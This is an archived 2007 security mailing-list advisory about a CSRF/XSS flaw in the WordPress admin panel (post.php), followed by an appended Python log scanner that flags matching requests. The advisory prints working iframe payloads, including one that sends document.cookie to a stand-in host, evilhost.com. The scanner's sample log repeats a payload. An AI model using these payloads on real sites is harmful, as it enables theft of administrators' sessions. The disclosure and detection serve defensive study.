WebApp Sec mailing list archives

WordPress AdminPanel CSRF/XSS - 0day


From: SaMuschie <samuschie () yahoo de>
Date: Mon, 26 Feb 2007 21:50:57 +0100 (CET)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

+---------------------------------------------------------------------------+
|               SaMuschie Research Labs proudly presents . . .              |  
+---------------------------------------------------------------------------+
| Application: wordpress                            Version: <= 2.1.1       |  
| Vuln./Exploit Type: AdminPanel CSRF/XSS           Status: 0day            |  
+---------------------------------------------------------------------------+
| Discovered by: Samenspender                       Released: 20070226      |  
| SaMuschie Release Number: 1                                               |  
+---------------------------------------------------------------------------+

Exploit:

Cookie in an Alert Box:
<iframe width=600 height=400
src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Clol=%27'></iframe>

Cookie sent to an Evil Host:
<iframe width=600 height=400
src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Eimage=document.createElement(%27img%27);image.src=%27http://evilhost.com/datagrabber.php?cookie=%27%2bdocument.cookie;%3C/script%3E%3Clol=%27'></iframe>

+---------------------------------------------------------------------------+
|                           Lameness Disclaimer                             |  
+---------------------------------------------------------------------------+
| SaMuschie Research Labs was found to publish vulnerabilities within well  |  
| known software products, which are easy to discover and exploit.          |  
|                                                                           |  
| SaMuschie researchers just spend a minimum of time and knowledge for each |
| vulnerability. Hence readers of this advisory are requested not to ask    |  
| any questions to the researchers.... they don't know the answer ;)        |  
+---------------------------------------------------------------------------+
+---------------------------------------------------------------------------+
| EOF                                                                       |  
+---------------------------------------------------------------------------+
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFF4xadMFgfGpQK8VERAkO5AJ9V8uosk2DATRTARHDhPxNe+RHirgCeKQ0h
aFgDpHnxPP+/4Ot5bLBZy9Q=
=/gS4
-----END PGP SIGNATURE-----
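
A defender-side check for the requests shown in this advisory, added here as an example and not part of the original post: it scans web server access logs for requests to wp-admin/post.php whose `post` parameter is not a plain integer, or that carry an action and arrive with an off-site Referer (as they would when loaded from an iframe on another site). The combined log format, the `site_host` default, the `forum.invalid` referer and all sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in "combined" access-log format (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Feb/2007:21:55:01 +0100] "GET /wp-admin/post.php?action=edit&post=42 HTTP/1.1" 200 5120 "http://example.com/wp-admin/edit.php" "Mozilla/5.0"',
    '192.0.2.11 - - [26/Feb/2007:21:56:13 +0100] "GET /wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Clol=%27 HTTP/1.1" 200 2310 "http://forum.invalid/thread/1" "Mozilla/5.0"',
    '192.0.2.12 - - [26/Feb/2007:21:57:40 +0100] "GET /wp-admin/post.php?action=delete&post=17 HTTP/1.1" 302 0 "http://forum.invalid/thread/2" "Mozilla/5.0"',
]

# Request line, status, size, then the quoted Referer field.
LINE_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)"'
)

def suspicious_requests(lines, site_host="example.com"):
    """Return [(line_number, [reasons])] for suspect wp-admin/post.php hits."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LINE_RE.search(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith("/wp-admin/post.php"):
            continue
        # parse_qs percent-decodes values, so encoded markup is seen in clear.
        params = parse_qs(url.query, keep_blank_values=True)
        reasons = []
        # A post id is an integer; anything else in "post" is an injection attempt.
        if any(not re.fullmatch(r"[0-9]+", v) for v in params.get("post", [])):
            reasons.append("non-numeric post id")
        # An admin action requested from a page on another host suggests CSRF.
        ref_host = urlsplit(m["referer"]).hostname
        if params.get("action") and ref_host not in (None, site_host):
            reasons.append("off-site referer")
        if reasons:
            findings.append((n, reasons))
    return findings

if __name__ == "__main__":
    for line_no, reasons in suspicious_requests(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(reasons)}")
```

The Referer check is a heuristic only, since browsers and proxies may omit the header; the numeric check on `post` is the stronger signal.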





        
                